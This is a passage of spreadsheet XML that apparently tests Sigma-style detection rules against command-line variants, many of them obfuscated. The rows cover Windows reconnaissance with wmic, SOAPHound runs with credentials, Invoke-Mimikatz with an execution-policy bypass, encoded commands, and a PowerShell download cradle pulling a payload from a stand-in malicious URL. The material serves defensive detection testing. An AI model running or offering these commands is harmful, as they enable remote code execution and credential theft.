      <c r="D247" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E247" s="36" t="inlineStr">
        <is>
          <t>wmic.exe /"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F247" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G247" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H247" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I247" s="43" t="n"/>
      <c r="J247" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K247" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1" s="42">
      <c r="A248" s="43" t="n"/>
      <c r="B248" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_system_info_uncommon</t>
        </is>
      </c>
      <c r="C248" s="36" t="inlineStr">
        <is>
          <t>Uncommon System Information Discovery Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D248" s="36" t="inlineStr">
        <is>
          <t>9d5a1274-922a-49d0-87f3-8c653483b909</t>
        </is>
      </c>
      <c r="E248" s="36" t="inlineStr">
        <is>
          <t>wmic LOGICALDISK where "Name='C:'" get Name,Size,FreeSpace /format:csv</t>
        </is>
      </c>
      <c r="F248" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G248" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H248" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I248" s="36" t="n"/>
      <c r="J248" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K248" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="249" ht="15.75" customHeight="1" s="42">
      <c r="A249" s="43" t="n"/>
      <c r="B249" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_system_info_uncommon</t>
        </is>
      </c>
      <c r="C249" s="36" t="inlineStr">
        <is>
          <t>Uncommon System Information Discovery Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D249" s="36" t="inlineStr">
        <is>
          <t>9d5a1274-922a-49d0-87f3-8c653483b909</t>
        </is>
      </c>
      <c r="E249" s="36" t="inlineStr">
        <is>
          <t>wmic os get Caption /value &amp;&amp; wmic os get OSArchitecture /value &amp;&amp; wmic os get Version /value</t>
        </is>
      </c>
      <c r="F249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H249" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I249" s="43" t="n"/>
      <c r="J249" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K249" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="250" ht="15.75" customHeight="1" s="42">
      <c r="A250" s="43" t="n"/>
      <c r="B250" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C250" s="36" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D250" s="36" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E250" s="36" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk list brief</t>
        </is>
      </c>
      <c r="F250" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G250" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H250" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I250" s="36" t="n"/>
      <c r="J250" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K250" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="251" ht="15.75" customHeight="1" s="42">
      <c r="A251" s="43" t="n"/>
      <c r="B251" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C251" s="36" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D251" s="36" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E251" s="36" t="inlineStr">
        <is>
          <t>wmic.exe partition get name,size</t>
        </is>
      </c>
      <c r="F251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H251" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I251" s="43" t="n"/>
      <c r="J251" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K251" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="252" ht="15.75" customHeight="1" s="42">
      <c r="A252" s="43" t="n"/>
      <c r="B252" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C252" s="36" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D252" s="36" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E252" s="36" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk where "DriveType=3" get Name,Size,FreeSpace</t>
        </is>
      </c>
      <c r="F252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H252" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I252" s="36" t="n"/>
      <c r="J252" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K252" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="253" ht="15.75" customHeight="1" s="42">
      <c r="A253" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B253" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C253" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D253" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E253" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "notepad C:\backup\passwords.log"</t>
        </is>
      </c>
      <c r="F253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H253" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I253" s="43" t="n"/>
      <c r="J253" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K253" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="254" ht="15.75" customHeight="1" s="42">
      <c r="A254" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B254" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C254" s="36" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D254" s="36" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E254" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "notepad C:\backup\passwords.log"</t>
        </is>
      </c>
      <c r="F254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H254" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I254" s="43" t="n"/>
      <c r="J254" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K254" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="255" ht="15.75" customHeight="1" s="42">
      <c r="A255" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B255" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_soaphound_execution</t>
        </is>
      </c>
      <c r="C255" s="36" t="inlineStr">
        <is>
          <t>HackTool - SOAPHound Execution</t>
        </is>
      </c>
      <c r="D255" s="36" t="inlineStr">
        <is>
          <t>e92a4287-e072-4a40-9739-370c106bb750</t>
        </is>
      </c>
      <c r="E255" s="36" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\atomics\T1059.001_x0008_in\SOAPHound.exe" --user thaim THAIMX --password P@ssword1 --dc 10.0.1.14 --buildcache  -c c:	emp\cache.txt</t>
        </is>
      </c>
      <c r="F255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H255" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I255" s="43" t="n"/>
      <c r="J255" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K255" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="256" ht="15.75" customHeight="1" s="42">
      <c r="A256" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B256" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_soaphound_execution</t>
        </is>
      </c>
      <c r="C256" s="36" t="inlineStr">
        <is>
          <t>HackTool - SOAPHound Execution</t>
        </is>
      </c>
      <c r="D256" s="36" t="inlineStr">
        <is>
          <t>e92a4287-e072-4a40-9739-370c106bb750</t>
        </is>
      </c>
      <c r="E256" s="36" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\atomics\T1059.001_x0008_in\SOAPHound.exe" --user thaim THAIMX --password P@ssword1 --dc 10.0.1.14 "--buildcache" "-c" c:	emp\cache.txt</t>
        </is>
      </c>
      <c r="F256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H256" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I256" s="36" t="n"/>
      <c r="J256" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K256" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="257" ht="15.75" customHeight="1" s="42">
      <c r="A257" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B257" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_soaphound_execution</t>
        </is>
      </c>
      <c r="C257" s="36" t="inlineStr">
        <is>
          <t>HackTool - SOAPHound Execution</t>
        </is>
      </c>
      <c r="D257" s="36" t="inlineStr">
        <is>
          <t>e92a4287-e072-4a40-9739-370c106bb750</t>
        </is>
      </c>
      <c r="E257" s="36" t="inlineStr">
        <is>
          <t>"C:\AtomicRedTeam\atomics\T1059.001_x0008_in\SOAPHound.exe" --user thaim --password P@ssword1 --domain THAIMX --dc 10.0.1.14 --bhdump --cachefilename=c:	emp\cache.txt --outputdirectory=c:	emp	est2</t>
        </is>
      </c>
      <c r="F257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I257" s="36" t="n"/>
      <c r="J257" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K257" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="258" ht="15.75" customHeight="1" s="42">
      <c r="A258" s="43" t="n"/>
      <c r="B258" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C258" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D258" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E258" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I258" s="36" t="n"/>
      <c r="J258" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K258" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="259" ht="15.75" customHeight="1" s="42">
      <c r="A259" s="43" t="n"/>
      <c r="B259" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C259" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D259" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E259" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I259" s="36" t="n"/>
      <c r="J259" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K259" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="260" ht="15.75" customHeight="1" s="42">
      <c r="A260" s="43" t="n"/>
      <c r="B260" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C260" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D260" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E260" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I260" s="36" t="n"/>
      <c r="J260" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K260" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="261" ht="15.75" customHeight="1" s="42">
      <c r="A261" s="43" t="n"/>
      <c r="B261" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C261" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D261" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E261" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H261" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I261" s="43" t="n"/>
      <c r="J261" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K261" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="262" ht="15.75" customHeight="1" s="42">
      <c r="A262" s="43" t="n"/>
      <c r="B262" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C262" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D262" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E262" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H262" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I262" s="36" t="n"/>
      <c r="J262" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K262" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="263" ht="15.75" customHeight="1" s="42">
      <c r="A263" s="43" t="n"/>
      <c r="B263" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C263" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D263" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E263" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H263" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I263" s="36" t="n"/>
      <c r="J263" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K263" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1" s="42">
      <c r="A264" s="43" t="n"/>
      <c r="B264" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C264" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D264" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E264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264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H264" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I264" s="36" t="n"/>
      <c r="J264" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K264" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1" s="42">
      <c r="A265" s="43" t="n"/>
      <c r="B265" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C265" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D265" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E265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265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I265" s="43" t="n"/>
      <c r="J265" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K265" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="266" ht="15.75" customHeight="1" s="42">
      <c r="A266" s="43" t="n"/>
      <c r="B266" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C266" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D266" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E266" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOprOfIle /"NonInteractive" -ep Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I266" s="43" t="n"/>
      <c r="J266" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K266" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="267" ht="15.75" customHeight="1" s="42">
      <c r="A267" s="43" t="n"/>
      <c r="B267" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C267" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D267" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E267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267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I267" s="43" t="n"/>
      <c r="J267" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K267" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="268" ht="15.75" customHeight="1" s="42">
      <c r="A268" s="43" t="n"/>
      <c r="B268" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C268" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D268" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E268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268" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G268" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H268" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I268" s="43" t="n"/>
      <c r="J268" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K268" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="269" ht="15.75" customHeight="1" s="42">
      <c r="A269" s="43" t="n"/>
      <c r="B269" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C269" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D269" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E269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269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H269" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I269" s="43" t="n"/>
      <c r="J269" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K269" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="270" ht="15.75" customHeight="1" s="42">
      <c r="A270" s="43" t="n"/>
      <c r="B270" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C270" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D270" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E270" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F270" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G270" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H270" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I270" s="36" t="n"/>
      <c r="J270" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K270" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="271" ht="15.75" customHeight="1" s="42">
      <c r="A271" s="43" t="n"/>
      <c r="B271" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C271" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D271" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E271" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F271" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G271" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H271" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I271" s="36" t="n"/>
      <c r="J271" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K271" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="272" ht="15.75" customHeight="1" s="42">
      <c r="A272" s="43" t="n"/>
      <c r="B272" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C272" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D272" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E272" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F272" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G272" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H272" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I272" s="43" t="n"/>
      <c r="J272" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K272" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1" s="42">
      <c r="A273" s="43" t="n"/>
      <c r="B273" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C273" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D273" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E273" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F273" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G273" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H273" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I273" s="36" t="n"/>
      <c r="J273" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K273" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="274" ht="15.75" customHeight="1" s="42">
      <c r="A274" s="43" t="n"/>
      <c r="B274" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C274" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D274" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E274" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F274" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G274" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H274" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I274" s="36" t="n"/>
      <c r="J274" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K274" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="275" ht="15.75" customHeight="1" s="42">
      <c r="A275" s="43" t="n"/>
      <c r="B275" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C275" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D275" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E275" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F275" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G275" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H275" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I275" s="43" t="n"/>
      <c r="J275" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K275" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1" s="42">
      <c r="A276" s="43" t="n"/>
      <c r="B276" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C276" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D276" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E276" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F276" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G276" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H276" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I276" s="36" t="n"/>
      <c r="J276" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K276" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="277" ht="15.75" customHeight="1" s="42">
      <c r="A277" s="43" t="n"/>
      <c r="B277" s="36" t="inlineStr">
        <is>
